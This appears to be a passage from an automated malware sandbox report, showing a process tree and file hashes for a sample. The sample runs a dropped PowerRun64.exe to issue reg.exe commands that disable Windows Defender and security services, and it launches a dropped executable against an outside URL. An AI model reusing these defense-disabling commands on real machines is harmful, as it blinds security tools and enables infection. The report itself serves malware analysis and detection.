                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Modifies data under HKEY_USERS
                                                    PID:3052
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
                                                      6⤵
                                                      • Modifies Security services
                                                      PID:2176
                                              • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:940
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2156
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Modifies data under HKEY_USERS
                                                    PID:2012
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
                                                      6⤵
                                                      • Modifies Security services
                                                      PID:2608
                                              • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2052
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2224
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Modifies data under HKEY_USERS
                                                    PID:2652
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
                                                      6⤵
                                                      • Modifies Security services
                                                      PID:2416
                                              • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2272
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1884
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Modifies data under HKEY_USERS
                                                    PID:2212
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
                                                      6⤵
                                                      • Modifies Security services
                                                      PID:1764
                                              • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2936
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2484
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Modifies data under HKEY_USERS
                                                    PID:2000
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
                                                      6⤵
                                                      • Modifies security service
                                                      PID:1920
                                              • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2620
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1612
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Modifies data under HKEY_USERS
                                                    PID:2804
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
                                                      6⤵
                                                      • Modifies security service
                                                      PID:772
                                              • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1952
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2024
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Modifies data under HKEY_USERS
                                                    PID:1456
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
                                                      6⤵
                                                      • Modifies Security services
                                                      PID:1432
                                              • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
                                                3⤵
                                                • Executes dropped EXE
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:1988
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2772
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
                                                    5⤵
                                                    • Executes dropped EXE
                                                    • Modifies data under HKEY_USERS
                                                    PID:2836
                                                    • C:\Windows\System32\reg.exe
                                                      "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
                                                      6⤵
                                                        PID:1912
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1900
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1132
                                                    • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Modifies data under HKEY_USERS
                                                      PID:896
                                                      • C:\Windows\System32\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
                                                        6⤵
                                                        • Modifies Security services
                                                        PID:2680
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:980
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:2204
                                                    • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Modifies data under HKEY_USERS
                                                      PID:2272
                                                      • C:\Windows\System32\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
                                                        6⤵
                                                        • Modifies Security services
                                                        PID:316
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:1692
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2052
                                                    • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Modifies data under HKEY_USERS
                                                      PID:2104
                                                      • C:\Windows\System32\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
                                                        6⤵
                                                        • Modifies Security services
                                                        PID:2700
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2912
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2596
                                                    • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Modifies data under HKEY_USERS
                                                      PID:2476
                                                      • C:\Windows\System32\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
                                                        6⤵
                                                        • Modifies Security services
                                                        PID:340
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2716
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2620
                                                    • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Modifies data under HKEY_USERS
                                                      PID:1232
                                                      • C:\Windows\System32\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
                                                        6⤵
                                                        • Modifies security service
                                                        PID:1624
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2444
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
                                                    4⤵
                                                    • Executes dropped EXE
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:872
                                                    • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Modifies data under HKEY_USERS
                                                      PID:1036
                                                      • C:\Windows\System32\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
                                                        6⤵
                                                        • Modifies security service
                                                        PID:1508
                                                • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                  PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:1680
                                                  • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
                                                    4⤵
                                                    • Executes dropped EXE
                                                    PID:348
                                                    • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Modifies data under HKEY_USERS
                                                      PID:2896
                                                      • C:\Windows\System32\reg.exe
                                                        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
                                                        6⤵
                                                        • Modifies Security services
                                                        PID:772
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Powershell -Command "Get-MpPreference"
                                                  3⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2892
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')
                                                  3⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  PID:1536
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')
                                                  3⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  PID:1428
                                              • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\tbjfarxhkycdu.exe
                                                "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\tbjfarxhkycdu.exe" "http://www.centurionresampling.click" "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\8423"
                                                2⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:1488
                                              • C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\win_version_csharp.exe
                                                "C:\Users\Admin\AppData\Local\Temp\nsd9A6C.tmp\win_version_csharp.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:2776
                                              • C:\Windows\SysWOW64\explorer.exe
                                                C:\Windows\system32\explorer.exe
                                                2⤵
                                                • Deletes itself
                                                • System Location Discovery: System Language Discovery
                                                PID:2344
                                            • C:\Windows\system32\makecab.exe
                                              "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241108023910.log C:\Windows\Logs\CBS\CbsPersist_20241108023910.cab
                                              1⤵
                                              • Drops file in Windows directory
                                              PID:852

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\5fced4a23532ffa6c68cee939e2e5029\1025\LocalizedData.xml

                                              Filesize

                                              72KB

                                              MD5

                                              c5bf74c96a711b3f7004ca6bddecc491

                                              SHA1

                                              4c4d42ff69455f267ce98f1db8f2c5d76a1046da

                                              SHA256

                                              6b67c8a77c1a637b72736595afdf77bdb3910aa9fe48d959775806a0683ffa66

                                              SHA512

                                              2f2071bf9966bffe64c90263f4b9bd5efcac4f976c4e42fbdeaa5d6a6dee51c33f4902cf5e3d0897e1c841e9182e25c86d42e392887bc3ce3d9ed3d780d96ac9

                                            • C:\5fced4a23532ffa6c68cee939e2e5029\1029\LocalizedData.xml

                                              Filesize

                                              79KB

                                              MD5

                                              0b6ed582eb557573e959e37ebe2fca6a

                                              SHA1

                                              82c19c7eafb28593f453341eca225873fb011d4c

                                              SHA256

                                              8a0da440261940ed89bad7cd65bbc941cc56001d9aa94515e346d57b7b0838fc

                                              SHA512

                                              aba3d19f408bd74f010ec49b31a2658e0884661d2efda7d999558c90a4589b500570cc80410ba1c323853ca960e7844845729fff708e3a52ea25f597fad90759

                                            • C:\5fced4a23532ffa6c68cee939e2e5029\1030\LocalizedData.xml

                                              Filesize

                                              75KB

                                              MD5

                                              69925e463a6fedce8c8e1b68404502fb

                                              SHA1

                                              76341e490a432a636ed721f0c964fd9026773dd7

                                              SHA256

                                              5f370d2ccdd5fa316bce095bf22670123c09de175b7801d0a77cdb68174ac6b7

                                              SHA512

                                              5f61abec49e1f9cc44c26b83aa5b32c217ebeba63ed90d25836f51f810c59f71ec7430dc5338efba9be720f800204891e5ab9a5f5ec1ff51ef46c629482e5220

                                            • C:\5fced4a23532ffa6c68cee939e2e5029\1031\LocalizedData.xml

                                              Filesize

                                              80KB

                                              MD5

                                              8505219c0a8d950ff07dc699d8208309

                                              SHA1

                                              7a557356c57f1fa6d689ea4c411e727438ac46df

                                              SHA256

                                              c48986cdb7fe3401234e0a6540eb394c1201846b5beb1f12f83dc6e14674873a

                                              SHA512

                                              7bcdad0cb4b478068434f4ebd554474b69562dc83df9a423b54c1701ca3b43c3b92de09ee195a86c0d244aa5ef96c77b1a08e73f1f2918c8ac7019f8df27b419

                                            • C:\5fced4a23532ffa6c68cee939e2e5029\1032\LocalizedData.xml

                                              Filesize

                                              84KB

                                              MD5

                                              3bf8da35b14fbcc564e03f6342bb71f2

                                              SHA1

                                              8f9139f0bb813bf95f8c437548738d32848d8940

                                              SHA256

                                              39efe12c689edfea041613b0e4d6ec78afec8fe38a0e4adc656591ffef8f415d

                                              SHA512

                                              31b050647ba4bd0c2762d77307e1ed2a324e9b152c06ed496b86ea063cdc18bf2bb1f08d2e9b4af3429a2bc333d7891338d7535487c83495304a5f78776dbc03

                                            • C:\5fced4a23532ffa6c68cee939e2e5029\1033\LocalizedData.xml

                                              Filesize

                                              75KB

                                              MD5

                                              326518603d85acd79a6258886fc85456

                                              SHA1

                                              f1cef14bc4671a132225d22a1385936ad9505348

                                              SHA256

                                              665797c7840b86379019e5a46227f888fa1a36a593ea41f9170ef018c337b577

                                              SHA512

                                              f8a514efd70e81d0f2f983282d69040bca6e42f29aa5df554e6874922a61f112e311ad5d2b719b6ca90012f69965447fb91e8cd4103efb2453ff160a9062e5d3

                                            • C:\5fced4a23532ffa6c68cee939e2e5029\1035\LocalizedData.xml

                                              Filesize

                                              75KB

                                              MD5

                                              1aa252256c895b806e4e55f3ea8d5ffb

                                              SHA1

                                              0322ee94c3d5ea26418a2fea3f7e62ec5d04b81d

                                              SHA256

                                              8a68b3b6522c30502202ecb8d16ae160856947254461ac845b39451a3f2db35f

                                              SHA512

                                              ce57784892c0be55a00ced0adc594a534d8a40819790ca483a29b6cd544c7a75ae4e9bde9b6dc6de489ceceb7883b7c2ea0e98a38fcc96d511157d61c8aa3e63

                                            • C:\5fced4a23532ffa6c68cee939e2e5029\1036\LocalizedData.xml

                                              Filesize

                                              81KB

                                              MD5

                                              1dad88faed661db34eef535d36563ee2

                                              SHA1

                                              0525b2f97eddbd26325fddc561bf8a0cda3b0497

                                              SHA256

                                              9605468d426bcbbe00165339d84804e5eb2547bfe437d640320b7bfef0b399b6

                                              SHA512

                                              ccd0bffbf0538152cccd4b081c15079716a5ff9ad04cee8679b7f721441f89eb7c6f8004cff7e1dde9188f5201f573000d0c078474edf124cfa4c619e692d6bc

                                            • C:\5fced4a23532ffa6c68cee939e2e5029\1037\LocalizedData.xml

                                              Filesize

                                              70KB

                                              MD5

                                              16e6416756c1829238ef1814ebf48ad6

                                              SHA1

                                              c9236906317b3d806f419b7a98598dd21e27ad64

                                              SHA256

                                              c0ee256567ea26bbd646f019a1d12f3eced20b992718976514afa757adf15dea

                                              SHA512

                                              aa595ed0b3b1db280f94b29fa0cb9db25441a1ef54355abf760b6b837e8ce8e035537738e666d27dd2a8d295d7517c325a5684e16304887ccb17313ca4290ce6

                                            • C:\5fced4a23532ffa6c68cee939e2e5029\1038\LocalizedData.xml

                                              Filesize

                                              84KB

                                              MD5

                                              89d4356e0f226e75ca71d48690e8ec15

                                              SHA1

                                              2336caa971527977f47512bc74e88cec3f770c7d

